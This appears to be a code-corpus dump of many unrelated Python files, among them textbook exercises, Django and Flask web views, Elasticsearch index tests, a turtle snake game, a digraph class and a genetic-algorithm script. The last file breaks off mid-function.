text stringlengths 8 6.05M |
|---|
### Chapter 7: Python 101 :Jimmy Moore ###
# Ex. 7.1: echo a file's contents in upper case (Python 2 syntax).
file = raw_input ('Enter a file name: ')
try:
    fhand = open(file)
except:  # NOTE(review): bare except also swallows KeyboardInterrupt; IOError would be narrower
    print 'Cannot open file : ', file
    exit()
for line in fhand:
    line = line.rstrip()  # drop the trailing newline before upper-casing
    print line.upper()
# Ex. 7.2: average the numeric values of 'X-DSPAM-Confidence:' lines in a file.
file = raw_input ('Enter a file name: ')
try:
    fhand = open(file)
except:  # NOTE(review): bare except is overly broad
    print 'Cannot open file : ', file
    exit()
count = 0   # number of matching lines seen
vspam = 0   # running sum of the confidence values
for line in fhand:
    line = line.rstrip()
    if line.find('X-DSPAM-Confidence:') == -1:
        continue  # skip lines without the header
    value = line[line.find(':')+1:]  # text after the first colon
    value = value.strip()
    vspam = vspam + float(value)
    count = count + 1
avg = vspam/count  # NOTE(review): ZeroDivisionError if no header line was found
print 'The average spam confidence from the file', file, 'is: ', avg
# Ex. 7.3: count 'Subject:' lines in a mailbox file, with an easter-egg input.
file = raw_input ('Enter a file name: ')
if file == 'na na boo boo':
    print 'NA NA BOO BOO TO YOU - You have been punk\'d!'
    exit()
try:
    fhand = open(file)
except:  # NOTE(review): bare except is overly broad
    print 'File cannot be opened: ', file
    exit()
count = 0
for line in fhand:
    if line.startswith('Subject:'):
        count = count + 1
print 'There were', count, 'subject lines in', file
import math
grades = [100, 100, 90, 40, 80, 100, 85, 70, 90, 65, 90, 85, 50.5]
def print_grades(grades):
    # Print each grade on its own line (Python 2 print statement).
    for grade in grades:
        print grade
def grades_sum(grades):
    """Return the total of all values in *grades* (0 for an empty list)."""
    return sum(grades)
def grades_average(grades):
    """Return the arithmetic mean of *grades*: their total over their count."""
    return grades_sum(grades) / len(grades)
def grades_variance(grades, average):
    """Return the population variance of *grades* about the given *average*."""
    squared_deviations = [(average - grade) ** 2 for grade in grades]
    return sum(squared_deviations) / len(grades)
# Demo (Python 2): show the variance once before the full report below.
print grades_variance(grades, grades_average(grades))
def grades_std_deviation(variance):
    """Standard deviation is the square root of the *variance*."""
    deviation = math.sqrt(variance)
    return deviation
# Demo report (Python 2 print statements): grades, sum, mean, variance, stddev.
print_grades(grades)
print grades_sum(grades)
print grades_average(grades)
print grades_variance(grades, grades_average(grades))
print grades_std_deviation(grades_variance(grades, grades_average(grades)))
# -*- coding: utf-8 -*-
import unittest
from django.test.testcases import TestCase, override_settings
from mock import patch, Mock, MagicMock, call
from stretch import stretch_app
from stretch.tests.base import get_connection
from example.models import Foo
from example.stretch_indices import FooIndex
def setUpModule():
    # Reset and reconnect the stretch app once for the whole module, with the
    # Elasticsearch connection patched to the test double (no real cluster).
    with patch('elasticsearch_dsl.connections.connections.get_connection', get_connection):
        stretch_app.reset()
        stretch_app.connect()
def tearDownModule():
    # Restore the app to a clean, connected state after this module's tests.
    stretch_app.reset()
    stretch_app.connect()
@patch('elasticsearch_dsl.connections.connections.get_connection', get_connection)
class StretchIndexTestCase(TestCase):
    """
    Test the Method and Properties of StretchIndex
    """
    def setUp(self):
        # Signals would auto-index on every Model.save(); keep tests explicit.
        stretch_app.deregister_signals()
    def test_auto_index_name(self):
        """
        Make sure we are generating correct index and document name from Model
        """
        index = FooIndex()
        self.assertEqual(index._get_index_name(), 'foos')
        self.assertEqual(index._get_doc_type_name(), 'foo')
    def test_dsl_doc_class(self):
        """
        Make sure we are generating the Elasticsearch DSL Document Correctly
        """
        index = FooIndex()
        # FIX: assertEquals is a deprecated alias of assertEqual (emits
        # DeprecationWarning); use the canonical name.
        self.assertEqual(index.dsl._doc_type.index, 'foos')
        self.assertEqual(index.dsl._doc_type.name, 'foo')
        EXPECTED_MAPPING = {
            'foo': {
                'properties': {
                    'autocomplete_name': {
                        'analyzer': 'autocomplete_analyzer',
                        'search_analyzer': 'standard',
                        'type': 'string'
                    },
                    'name': {
                        'analyzer': 'standard',
                        'type': 'string'
                    },
                    'bar': {
                        'type': 'string'
                    }
                }
            }
        }
        self.assertDictEqual(index.dsl._doc_type.mapping.to_dict(), EXPECTED_MAPPING)
    def test_custom_source(self):
        """
        Test index method as field source
        """
        index = FooIndex()
        foo = Foo(name='my foo', content='foo content', decimal=2.0)
        foo.save()
        doc = index._populate_doc(foo)
        self.assertEqual(doc.bar, 'custom value')
    def test_populate_doc(self):
        """The generated document mirrors the model's pk and fields."""
        index = FooIndex()
        foo = Foo(name='my foo', content='foo content', decimal=2.0)
        foo.save()
        doc = index._populate_doc(foo)
        self.assertEqual(doc._id, foo.pk)
        self.assertEqual(doc.name, foo.name)
    def test_update_doc(self):
        """update_doc() must hit the ES index endpoint."""
        index = FooIndex()
        foo = Foo(name='my foo', content='foo content', decimal=2.0)
        foo.save()
        index.update_doc(foo)
        self.assertTrue(stretch_app.connection.index.called)
    def test_remove_doc(self):
        """remove_doc() must hit the ES delete endpoint."""
        index = FooIndex()
        foo = Foo(name='my foo', content='content', decimal=2.0)
        foo.save()
        index.update_doc(foo)
        index.remove_doc(foo.pk)
        self.assertTrue(stretch_app.connection.delete.called)
    @patch('example.stretch_indices.FooIndex._populate_doc')
    @patch('stretch.indices.logger')
    def test_update_doc_log_exception(self, mock_logger, mock_populate):
        """By default, save failures are logged rather than raised."""
        def raise_exc(*args, **kwargs):
            raise Exception('Test Exception')
        mock_populate.return_value.save = raise_exc
        index = FooIndex()
        foo = Foo(name='my foo', content='foo content', decimal=2.0)
        foo.save()
        index.update_doc(foo)
        mock_logger.exception.assert_called_once()
    @patch('example.stretch_indices.FooIndex._populate_doc')
    @patch('stretch.indices.logger')
    def test_update_doc_raise_exception(self, mock_logger, mock_populate):
        """With RAISE_EXCEPTIONS on, save failures propagate to the caller."""
        def raise_exc(*args, **kwargs):
            raise Exception('Test Exception')
        mock_populate.return_value.save = raise_exc
        index = FooIndex()
        foo = Foo(name='my foo', content='foo content', decimal=2.0)
        foo.save()
        # FIX: the original mutated the shared settings dict and never restored
        # it, leaking RAISE_EXCEPTIONS=True into every later test in the run.
        previous = stretch_app.settings.get('RAISE_EXCEPTIONS')
        self.addCleanup(stretch_app.settings.__setitem__, 'RAISE_EXCEPTIONS', previous)
        stretch_app.settings['RAISE_EXCEPTIONS'] = True
        with self.assertRaises(Exception):
            index.update_doc(foo)
    def test_update_docs(self):
        """Bulk reindexing goes through parallel_bulk, not per-doc index calls."""
        stretch_app.connection.index.reset_mock()
        bulk_mock = MagicMock()
        with patch('stretch.indices.parallel_bulk', bulk_mock):
            index = FooIndex()
            foo = Foo(name='my foo', content='content', decimal=2.0)
            foo.save()
            other_foo = Foo(name='other foo', content='content', decimal=2.0)
            other_foo.save()
            index.update_docs()
            self.assertTrue(bulk_mock.called)
    def test_delete_index(self):
        """delete_index() asks ES to drop the index by its generated name."""
        index = FooIndex()
        index.delete_index()
        stretch_app.connection.indices.delete.assert_called_with(index=index._get_index_name())
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from django.http import HttpResponse
from adafruit_motorkit import MotorKit
from adafruit_motor import stepper
import time
import subprocess
RESPONSE_STRING = "Welcome back!"
RUN_CMD = "sudo python3 open.py"
# Opens Door
def open(self):
    """Run the motor script to open the door and report status via HTTP headers.

    NOTE(review): the name shadows the builtin ``open``, and the parameter is
    presumably Django's request object despite being named ``self`` -- confirm.
    """
    # Initializes HTTP response object (pessimistic ExitStatus until the script runs)
    httpResponse = HttpResponse(RESPONSE_STRING)
    httpResponse['ExitStatus'] = 1
    # Calls python script to run the motors.
    # NOTE(review): shell=True with sudo is acceptable only because RUN_CMD is a
    # fixed string with no user input -- keep it that way.
    subprocess.call(RUN_CMD, shell=True)
    # Returns HTTP response object
    httpResponse['ExitStatus'] = 0 # 0-Successful, 1-Unsuccessful
    httpResponse['DoorStatus'] = 0 # 0-Closed, 1-Operating
    httpResponse['RoommateStatus'] = 0 # 0-In, 1-Away, 2-DoNotDisturb, 3-Sleeping
    return httpResponse
|
from django.shortcuts import render, HttpResponse
from web_app.models import *
from web_app.serializers import *
from rest_framework.views import APIView
from django.http import JsonResponse
# Create your views here.
def index(request):
    """Landing view: returns a plain hello ('你好') response."""
    return HttpResponse('你好')
# Example: http://127.0.0.1:8000/news/?id=1
def news_content(request):
    """Render the News article selected by the ``id`` query parameter.

    Falls back to a '404' placeholder title/body when no such article exists.
    """
    id_num = request.GET.get('id')
    context = {}
    try:
        context['News'] = News.objects.get(id=id_num)
        context['title'] = context['News'].title
    except News.DoesNotExist:
        context['News'] = '404'
        context['title'] = '404'
    # FIX: the original returned inside the except block AND again after it;
    # the second return was unreachable dead code. One exit point suffices.
    return render(request, 'web_app/article.html', context)
# Example: http://127.0.0.1:8000/get_news/?id=1
class GetNews(APIView):
    def get(self, request):
        # Read the url parameter.
        # NOTE(review): id_num is fetched but never used -- every News row is
        # serialized below regardless of the requested id; confirm intent.
        id_num = request.GET.get('id')
        serializer = NewsSerializer(News.objects.all(), many=True)
        # Response payload
        msg = {
            'success': True,
            'data': serializer.data
        }
        # ensure_ascii=False keeps Chinese text readable instead of \u escapes
        return JsonResponse(msg, json_dumps_params={'ensure_ascii': False})
__author__ = 'Bill'
import graphlab as gl
import math
## Load training data
train = gl.load_sframe("/Users/Bill/Dropbox/cs151/ctr/full_train_data")
train.remove_column("hour")  # drop columns not used as features
train.remove_column("id")
train["click"] = train["click"].astype(int)
subset = train[1:100]  # NOTE(review): skips row 0; [0:100] would take the first 100 rows -- confirm
print train.groupby("click", {'count': gl.aggregate.COUNT()})
# Rebalance classes: keep every clicked row, sample 20% of the non-clicks
clicked = train.filter_by([1], "click")
no_click = train.filter_by([0], "click")
no_skew = clicked.append(no_click.sample(0.2))
print no_skew.groupby("click", {'count': gl.aggregate.COUNT()})
## Train model (SVM fresh; boosted/logistic loaded pre-trained from disk)
svm_model = gl.svm_classifier.create(subset, target="click")
full_boosted_model = gl.load_model("/Users/Bill/Dropbox/cs151/ctr/full_boosted_model")
full_logistic_model = gl.load_model("/Users/Bill/Dropbox/cs151/ctr/full_logistic_model")
## Testing
test = gl.load_sframe("/Users/Bill/Dropbox/cs151/ctr/full_test_data")
results = gl.SFrame()
results["id"] = test["id"]  # keep ids before dropping the column for prediction
test.remove_column("hour")
test.remove_column("id")
ttest = test[1:100]
## Predict
# SVM margins are squashed through a sigmoid to get pseudo-probabilities
svm_pred = svm_model.predict(ttest, output_type="margin").apply(lambda x: 1.0 / (1.0 + math.exp(-x)))
boosted_pred = full_boosted_model.predict(ttest, output_type="probability")
logistic_pred = full_logistic_model.predict(ttest, output_type="probability")
## Write results
# Weighted ensemble: boosted trees dominate (0.6); logistic and svm get 0.2 each
results["click"] = boosted_pred * 0.6 + logistic_pred * 0.2 + svm_pred * 0.2
print results
#results.save("/Users/Bill/Desktop/joinedResults.csv", format="csv")
|
# Create a file and append one record in 'name;age;CPF;' format
nome = input("Digite o nome: ")
idade = input("Digite a idade: ")
cpf = input("Digite o CPF: ")
registro = '\n' + nome + ';' + idade + ';' + cpf + ';'
with open('registro.txt','a+') as f:
    f.write(registro)
exit()  # NOTE(review): everything below this exit() is dead code -- confirm which half is wanted
# Look up a record by CPF in a semicolon-separated file
cpf = input('Digite o cpf: ')
with open('arquivo_pessoa.json') as f:
    conteudo = f.readlines()
# e.g. ['111.222.333-45;guilherme;30;',
#       '111.222.333-46;luciana;28;']
for registro in conteudo:
    # e.g. '111.222.333-45;guilherme;30;'
    if cpf in registro:
        saida = registro.split(';')
        print('CPF:', saida[0])
        print('Nome:', saida[1])
        print('Idade:', saida[2])
print(conteudo)
exit()
# Create a file and store one record (unreachable repeat of the first block)
nome = input("Digite o nome: ")
idade = input("Digite a idade: ")
cpf = input("Digite o CPF: ")
from turtle import Turtle,Screen
import time
UP = 90
DOWN = 270
LEFT = 180
RIGHT = 0
class Snake:
    """A minimal turtle-graphics snake: a list of segments, snake[0] is the head."""
    def __init__(self):
        # Black 600x600 window containing three green circle segments
        self.screen = Screen()
        self.snake = [Turtle(shape="circle") for _ in range(3)]
        self.screen.bgcolor("black")
        self.screen.setup(width=600, height=600)
        self.screen.title("Snake game")
        self.header = self.snake[0]  # alias for the head segment
        for i in range(len(self.snake)):
            self.snake[i].color("green")
            self.snake[i].up()  # pen up: segments move without drawing trails
            self.snake[i].setpos(x=i*-20, y=0.0)  # head at origin, body extending left
    def move(self):
        self.screen.tracer(0)  # disable auto-refresh; screen.update() redraws
        # while True:
        self.screen.update()
        time.sleep(0.1)
        # Walk tail -> head so each segment steps into its predecessor's spot
        for i in range(len(self.snake)-1, 0, -1):
            self.snake[i].goto(self.snake[i-1].xcor(), self.snake[i-1].ycor())
        self.snake[0].fd(20)
    def left(self):
        # Key handler: shift the body, turn the head (unless that would be a
        # 180-degree reversal), then step forward.
        self.screen.update()
        time.sleep(0.01)
        for i in range(len(self.snake)-1, 0, -1):
            self.snake[i].goto(self.snake[i-1].xcor(), self.snake[i-1].ycor())
        if self.snake[0].heading() != RIGHT:
            self.snake[0].seth(LEFT)
        self.snake[0].fd(20)
    def right(self):
        # Same as left(), mirrored: refuse turning while heading LEFT.
        self.screen.update()
        time.sleep(0.01)
        for i in range(len(self.snake)-1, 0, -1):
            self.snake[i].goto(self.snake[i-1].xcor(), self.snake[i-1].ycor())
        if self.snake[0].heading() != LEFT:
            self.snake[0].seth(RIGHT)
        self.snake[0].fd(20)
    def down(self):
        # Refuse turning down while heading UP (no reversing into the body).
        self.screen.update()
        time.sleep(0.01)
        for i in range(len(self.snake)-1, 0, -1):
            self.snake[i].goto(self.snake[i-1].xcor(), self.snake[i-1].ycor())
        if self.snake[0].heading() != UP:
            self.snake[0].seth(DOWN)
        self.snake[0].fd(20)
    def up(self):
        # Refuse turning up while heading DOWN.
        self.screen.update()
        time.sleep(0.01)
        for i in range(len(self.snake)-1, 0, -1):
            self.snake[i].goto(self.snake[i-1].xcor(), self.snake[i-1].ycor())
        if self.snake[0].heading() != DOWN:
            self.snake[0].seth(UP)
        self.snake[0].fd(20)
|
#!python3
"""
Implementation of a directed Graph Class
"""
from graphs.vertex import Vertex
class Digraph:
    """A directed graph of ``Vertex`` objects keyed by vertex id."""
    def __init__(self):
        """
        Initializes a graph object with an empty dictionary.
        self.vert_dict     -> Mapping of key -> Vertex
        self.num_verticies -> Number of vertices added so far
        self.num_edges     -> Number of edges added so far
        """
        self.vert_dict = {}
        self.num_verticies = 0
        self.num_edges = 0
    def add_vertex(self, key):
        """
        Add a new vertex object to the graph with
        the given key and return the vertex.
        """
        self.num_verticies += 1
        new_vertex = Vertex(key)
        self.vert_dict[key] = new_vertex
        return new_vertex
    def add_edge(self, f, t, cost=0):
        """Add a directed edge from vertex f to vertex t with a cost.

        Missing endpoints are created on demand.
        FIX: the original also added the reverse edge t -> f, which silently
        turned this *directed* graph into an undirected one.
        """
        if f not in self.vert_dict:
            self.add_vertex(f)
        if t not in self.vert_dict:
            self.add_vertex(t)
        self.vert_dict[f].add_neighbor(self.vert_dict[t], cost)
        self.num_edges += 1
    def get_vertices(self):
        """return all the vertex keys in the graph"""
        return self.vert_dict.keys()
    def get_edges(self, vertex):
        """Return the neighbor mapping of *vertex* (KeyError if absent)."""
        dict_edges = self.vert_dict[vertex].neighbors
        return dict_edges
    def _dfs_recursive(self, from_vert, to_vert, visited):
        """Depth-first traversal from *from_vert*; returns the visited key set.

        ``to_vert`` is only validated for existence -- traversal does not stop
        early upon reaching it.
        Resources: https://eddmann.com/posts/depth-first-search-and-breadth-first-search-in-python/
        """
        # Error handling to make sure that both the vertices are in the graph
        if from_vert not in self.vert_dict or to_vert not in self.vert_dict:
            raise KeyError("Either or both of the keys are not in the graph!")
        if visited is None:
            visited = set()
        curr_vert = self.vert_dict[from_vert]
        visited.add(from_vert)
        for neighbor in curr_vert.get_neighbors():
            if neighbor.id not in visited:
                self._dfs_recursive(neighbor.id, to_vert, visited)
        return visited
    def _dfs_recursive_find_path(self, from_vert: str, to_vert: str):
        """
        Find the vertices reachable from *from_vert* using DFS.

        NOTE(review): despite the name, this returns the *visited set* from
        the DFS, not an ordered path between the two vertices -- confirm
        callers expect that.
        """
        path = self._dfs_recursive(from_vert, to_vert, set())
        return path
import selenium.webdriver as webdriver
from constants import driver_path
def has_digits(input_str):
    """Return True if *input_str* contains at least one decimal digit."""
    for character in input_str:
        if character.isdigit():
            return True
    return False
def start_headless_driver():
    """Launch a headless Chrome webdriver using the configured driver_path.

    NOTE(review): executable_path/chrome_options are deprecated keyword names
    in newer Selenium releases -- confirm the pinned selenium version.
    """
    options = webdriver.ChromeOptions()
    options.add_argument('headless')
    return webdriver.Chrome(executable_path=driver_path, chrome_options=options)
|
import base64
#encoding=utf-8
# Encode: UTF-8 bytes of the message -> base64 bytes -> base64 text.
data = "我爱你中国".encode("utf-8")
data_b64 = base64.b64encode(data)
data2 = data_b64.decode("utf-8")
# Decode data2: back to base64 bytes, then to the original UTF-8 text.
data2 = data2.encode('utf-8')
data2_decode = base64.b64decode(data2)
data3 = data2_decode.decode('utf-8')
print(data3)
from datetime import date
from django.contrib.auth.models import User
from django.contrib.auth import get_user_model
from rest_framework import serializers
from .models import Profile,TermsConditionsText,TermsConditions
from hrr.fitbit_aa import belowaerobic_aerobic_anaerobic
class UserSerializer(serializers.ModelSerializer):
    """Serializes the core auth User identity fields."""
    class Meta:
        model = User
        fields = ('id','username','email','first_name','last_name')
class UserProfileSerializer(serializers.ModelSerializer):
    """Serializes a Profile together with its related auth User fields.

    The user fields are declared with ``source='user.<field>'``, so validated
    input nests them under a ``user`` key (consumed in ``create``).
    """
    username = serializers.CharField(source='user.username')
    email = serializers.EmailField(source='user.email')
    password = serializers.CharField(source='user.password',write_only=True)
    first_name = serializers.CharField(source='user.first_name')
    last_name = serializers.CharField(source='user.last_name')
    def validate_username(self,username):
        '''
        Make a case insensitive check to determine uniqueness of username
        '''
        UserModel = get_user_model()
        case_insensitive_username_field = "{}__iexact".format(UserModel.USERNAME_FIELD)
        if (username and UserModel._default_manager.filter(
                **{case_insensitive_username_field:username}).exists()):
            raise serializers.ValidationError("Username already exist")
        return username
    def validate_email(self,email):
        '''
        Make a case insensitive check to determine uniqueness of email
        '''
        UserModel = get_user_model()
        case_insensitive_email_field = "{}__iexact".format(UserModel.EMAIL_FIELD)
        if (email and UserModel._default_manager.filter(
                **{case_insensitive_email_field:email}).exists()):
            raise serializers.ValidationError("Email already exist")
        return email
    def get_user_age(self,obj):
        '''Return the age in whole years from date_of_birth, else the stored user_age.'''
        today = date.today()
        dob = obj.date_of_birth
        if dob:
            # Subtract one year when this year's birthday has not happened yet
            return (today.year - dob.year
                    - ((today.month, today.day) < (dob.month, dob.day)))
        else:
            return obj.user_age
    def get_user_aa_ranges(self, obj):
        '''Return the aerobic/anaerobic heart-rate range starts for this user's age.'''
        age = self.get_user_age(obj)
        aa_ranges = belowaerobic_aerobic_anaerobic(obj.user.username,age)
        return {
            "aerobic_range_start":aa_ranges[1],
            "anaerobic_range_start":aa_ranges[2]
        }
    class Meta:
        model = Profile
        fields = ('id','username','email','password','first_name','last_name',
                  'gender','height','weight','date_of_birth','user_age',
                  'created_at','updated_at','terms_conditions')
    def create(self,validated_data):
        '''Create the auth User, its Profile, and (if accepted) a T&C record.'''
        user_data = validated_data.pop('user')
        user = User.objects.create_user(**user_data)
        profile = Profile.objects.create(user=user,**validated_data)
        if validated_data['terms_conditions']:
            terms = TermsConditionsText.objects.get(version='1.0')
            TermsConditions.objects.create(user=user,
                                           terms_conditions_version=terms)
        return profile
    def update(self, instance, validated_data):
        '''Update the profile (and the user's email) from validated data.

        NOTE(review): fields declared with source='user.*' normally arrive
        nested under validated_data['user'], so these flat .get() lookups may
        always fall back to their defaults -- confirm against callers.
        '''
        user = instance.user
        user.email = validated_data.get('email',user.email)
        user.save()
        instance.first_name = validated_data.get('first_name', user.first_name)
        # FIX: the default here was user.first_name (copy-paste), which
        # overwrote the last name with the first name whenever 'last_name'
        # was absent from the payload.
        instance.last_name = validated_data.get('last_name', user.last_name)
        instance.gender = validated_data.get('gender',instance.gender)
        instance.height = validated_data.get('height', instance.height)
        instance.weight = validated_data.get('weight', instance.weight)
        instance.date_of_birth = validated_data.get('date_of_birth',instance.date_of_birth)
        instance.user_age = validated_data.get('user_age', instance.user_age)
        instance.save()
        return instance
    def linktotc(self,validated_data):
        '''Create a user and link a TermsConditions record to it.'''
        user_data = validated_data.pop('user')
        user = User.objects.create_user(**user_data)
        termsconditions = TermsConditions.objects.create(user=user,**validated_data)
        return termsconditions
    def to_representation(self,instance):
        '''Augment the serialized output with computed age and HR ranges.'''
        serialized_data = super().to_representation(instance)
        serialized_data['user_age'] = self.get_user_age(instance)
        serialized_data['aa_ranges'] = self.get_user_aa_ranges(instance)
        return serialized_data
from appium_auto.three.page.base_page import BasePage
from py_test.pytest_shuju_qudong.page.market import Market
class Search(BasePage):
    """Search page object: drives the search flow described in search.yaml."""
    def search(self, value):
        # Inject the query text into the parameters consumed by the YAML steps
        self._param["value"]=value
        self.steps("../page/search.yaml")
        # Searching lands on the market page; hand back its page object
        return Market(self._driver)
from helper import helper
from score import score
import random as rm
import math as m
import sys
import copy
import time
import matplotlib.pyplot as plt
import numpy as np
''' Survival of the Fittest algorithm'''
def populationBased(populationSize, mel, mir):
    '''
    A population based optimization algorithm based on genetic algorithms,
    which are metaheuristics inspired by the process of natural selection.
    The optimization consists of mutating the genome sequence of the
    Drosophila Melanogaster into the Drosophila Miranda.
    The algorithm mutates N(populationSize) random gene rows from the mel,
    then calculate the score per gene row and chooses, based on that score,
    the best gene row. This continues with each new mutation, until the best
    gene found is the solution (mir).
    Arguments:
    ------------------------------------------------------------
    populationSize: Integer value that signifies the magnitude of the population
    size.
    ------------------------------------------------------------
    mel: The gene row list where to start from.
    ------------------------------------------------------------
    mir: The gene row list where to finish.
    ------------------------------------------------------------
    Returns:
    ------------------------------------------------------------
    Generation: List containing all best found generows and their scores
    that brought to the solution.
    ------------------------------------------------------------
    Count: Integer value that signifies the amount of mutations needed.
    ------------------------------------------------------------
    '''
    # Everything is logged both to the console and to resultaten/population.txt
    with open("resultaten/population.txt", "w") as f:
        print("SURVIVAL OF THE FITTEST ALGORITHM", file=f)
        print("---------------------------------", file=f)
        print("---------------------------------")
        print("SURVIVAL OF THE FITTEST ALGORITHM")
        print("---------------------------------")
        print("Start of with Mel:", mel)
        print(" ".join(("Start off with Mel:", str(mel))), file=f)
        print("Run algorithm so that Mel turns in to Mir:", mir)
        print(" ".join(("Run algorithm so that Mel turns in to Mir:", str(mir)))
              , file=f)
        print("Finding best mutated Mel per iteration out of the population"
              + "size:", populationSize)
        print(" ".join(("Finding best mutated Mel per iteration out of the"
              + "population size:", str(populationSize))), file=f)
        generation = [(0,())]  # (score, generow) history; sentinel score 0
        count = 0              # total number of mutation rounds performed
        bestMel = mel
        lastGen = mel
        while lastGen != mir:
            # mutate from best mel X amount of new children
            swapList = helper.mutate(bestMel, populationSize, [])
            # make a set of the swapList so it deletes doubles
            swapList = set(swapList)
            # calculate and append score to new children
            scoreList = score.scoreNeighboursList(swapList, [], mir)
            # manipulate data so that score and children are
            # connected in a tuple
            tupleSwap = helper.makeTuple([], scoreList, swapList)
            # order tuple from low score to high score
            orderedTuple = sorted(tupleSwap)
            # define new and previous best score
            newBestScore = orderedTuple[-1][0]
            prevBestScore = generation[-1][0]
            # take the last item in ordered list tuple to get the best
            # score and it's gene row
            best = (orderedTuple[-1][0], orderedTuple[-1][1])
            # if new generated gene row is better than previous append
            # new as new best
            if prevBestScore <= newBestScore:
                generation.append(best)
                # continue with new gene row to mutate
                bestMel = list(orderedTuple[-1][1])
            lastGen = list(generation[-1][1])
            print("Best Found (score, [genrow]):", best,
                  ", Mutation number:", count+1)
            print(" ".join(("Best Found (score, [genrow], mutationPoints):"
                  , str(best), ", Mutation number:", str(count+1))), file=f)
            count += 1
            # check if reversed is true, if yes swap to ascending order
            # NOTE(review): 'reversed' shadows the builtin of the same name
            reversed = helper.isReversed(lastGen)
            if reversed == True:
                # NOTE(review): swapMel is not defined or imported in this
                # file -- this raises NameError if ever reached; perhaps
                # helper.swapMel was intended. Confirm.
                swapMel(24,0,lastGen)
        print(" ".join(("Winning Generation[(score, genrow), (nextBestScore,"
              + "nextBestGenRow), ...]:", str(generation))), file=f)
        print(" ".join(('Amount of mutations needed:', str(count))), file=f)
        print("-----------------------------")
        print("-----------------------------", file=f)
        print("RESULT")
        print("-----------------------------")
        return generation, count
|
#!/usr/bin/python3
'''
Creation, Updating, Deleting functions from Flask application
'''
import models
from models import storage
from app import application
from flask import render_template, flash, redirect, url_for, request, session
from flask import jsonify, abort
from app.forms import CreateTrip
from flask_login import current_user, login_required
# Getter Functions for Dynamic Loading
@application.route('/trip_roster', methods=["GET", "POST"])
@login_required
def trip_roster():
    '''
    Populates the modal footer with all users on a specific trip
    '''
    users = []
    if request.method == "POST":
        content = request.get_json()
        print(content)
        # Resolve each posted username to its stored user record
        for user in content['users']:
            user_obj = storage.get_user(user)
            if user_obj:
                users.append(user_obj.to_dict_mongoid())
            else:
                abort(404)  # any unknown username aborts the whole request
    if users:
        return jsonify(users)
    else:
        abort(404)  # GET requests and empty rosters also 404
@application.route('/get_trip/<trip_id>', methods=["GET"])
@login_required
def get_trip(trip_id):
    '''
    Grabs a specific trip from the database based on the trip ID to be
    used for dynamic AJAX updates on modals
    '''
    trip = storage.get("Trip", trip_id)
    if trip:
        return jsonify(trip.to_dict_mongoid())
    else:
        abort(404)
@application.route('/get_sender/<notification_id>', methods=["GET"])
@login_required
def get_sender(notification_id):
    '''
    Grabs the notification sender user from the database in order
    to dynamically update the message modal
    '''
    note = storage.get("Notification", notification_id)
    if not note:
        # FIX: the original fell off the end (returning None -> server error)
        # when the notification was missing; 404 like the sibling lookups.
        abort(404)
    user = storage.get_user(note.sender)
    if user:
        return jsonify(user.to_dict_mongoid())
    else:
        abort(404)
@application.route('/users/<username>', methods=["GET"])
@login_required
def get_user_profile(username):
    '''
    Renders another user's profile page with their hosted and active trips;
    viewing your own username redirects to your own profile view.
    '''
    if username == current_user.username:
        return redirect(url_for('display_profile'))
    hosted_trips = []
    active_trips = []
    user = storage.get_user(username)
    if user:
        # Expand stored trip ids into full Trip objects for the template
        for trip in user.hosted_trips:
            hosted_trips.append(storage.get("Trip", trip))
        for trip in user.active_trips:
            active_trips.append(storage.get("Trip", trip))
        # Remember this page so post-action redirects return here
        session['url'] = url_for('get_user_profile', username=username)
        tripform = CreateTrip(request.form)
        return render_template('user_profile.html', user=user,
                               hosted_trips=hosted_trips,
                               active_trips=active_trips,
                               tripform=tripform)
    else:
        abort(404)
#######################################################################
# Object Creation Functions
@application.route('/createtrip', methods=["GET", "POST"])
@login_required
def create_trip():
    '''
    Creates a new trip object in the database
    '''
    tripform = CreateTrip(request.form)
    if request.method == "POST" and tripform.validate_on_submit():
        # Denormalized host info is copied onto the trip for cheap display
        trip_dict = {"city": tripform.city.data,
                     "country": tripform.country.data,
                     "date_range": tripform.dates.data,
                     "description": tripform.description.data,
                     "users": [current_user.username],
                     "host": current_user.username,
                     "host_pic": current_user.profile_pic,
                     "host_firstname": current_user.first_name,
                     "host_lastname": current_user.last_name}
        new_trip = models.Trip(**trip_dict)
        # First hosted trip may need the list attribute created
        if current_user.hosted_trips:
            current_user.hosted_trips.append(new_trip.id)
        else:
            setattr(current_user, "hosted_trips", [new_trip.id])
        storage.save(current_user)
        storage.save(new_trip)
        # Bounce back to whichever page initiated the creation
        return redirect(session['url'])
    else:
        return "", 204  # GET or invalid form: no content, nothing to do
@application.route('/send_notification/<trip_id>', methods=["POST"])
@login_required
def send_notification(trip_id):
    '''
    Sends a notification to a trip host and saves the notification
    to the user's sent notifications and the host's received notifications
    '''
    note = models.Notification()
    trip = storage.get("Trip", trip_id)
    if trip:
        trip_host = storage.get_user(trip.host)
        if trip_host:
            # Check if user is trying to join his/her own trip
            if trip_host.username == current_user.username:
                return jsonify({"response": "Can't request own trip..."})
            # Check if user has already a sent a request for this trip
            for notification in current_user.notifications['sent']:
                sent = storage.get("Notification", notification)
                if sent.trip_id == trip_id:
                    print("Already sent")
                    return jsonify({"response": "Request already sent..."})
            # Check if user has already joined the selected trip
            if current_user.username in trip.users:
                return jsonify({"response": "Already part of this trip"})
            # Send a request to the host that current user wants to join
            note.sender = current_user.username
            note.recipient = trip.host
            note.trip_id = trip_id
            note.purpose = "Join"
            # Snapshot of trip info so the notification renders without a lookup
            note.trip_info = {"country": trip.country, "city": trip.city, "date_range": trip.date_range}
            current_user.notifications['sent'].append(note.id)
            trip_host.notifications['received'].append(note.id)
            storage.save(note)
            storage.save(current_user)
            storage.save(trip_host)
            print("Success")
            return jsonify({"response": "Successfully Sent!"})
        else:
            abort(404)
    else:
        abort(404)
@application.route('/friend_request/<username>', methods=["GET"])
@login_required
def send_friend_request(username):
    '''
    Sends a friend-request notification from the current user to *username*.
    '''
    note = models.Notification()
    note.sender = current_user.username
    note.recipient = username
    note.purpose = "Friend"
    recipient = storage.get_user(username)
    if recipient:
        # FIX: the original reused the name ``note`` as the loop variable
        # (clobbering the freshly created notification) and iterated the
        # stored notification *ids* while reading .purpose/.sender off them.
        # Look each id up first, mirroring send_notification() above.
        for sent_id in current_user.notifications['sent']:
            sent = storage.get("Notification", sent_id)
            if sent and sent.purpose == "Friend" \
                    and sent.sender == current_user.username \
                    and sent.recipient == recipient.username:
                return jsonify({"response": "Friend request pending.."})
        if recipient.username in current_user.friends:
            return jsonify({"response": "Already friends"})
        current_user.notifications['sent'].append(note.id)
        recipient.notifications['received'].append(note.id)
        storage.save(note)
        storage.save(recipient)
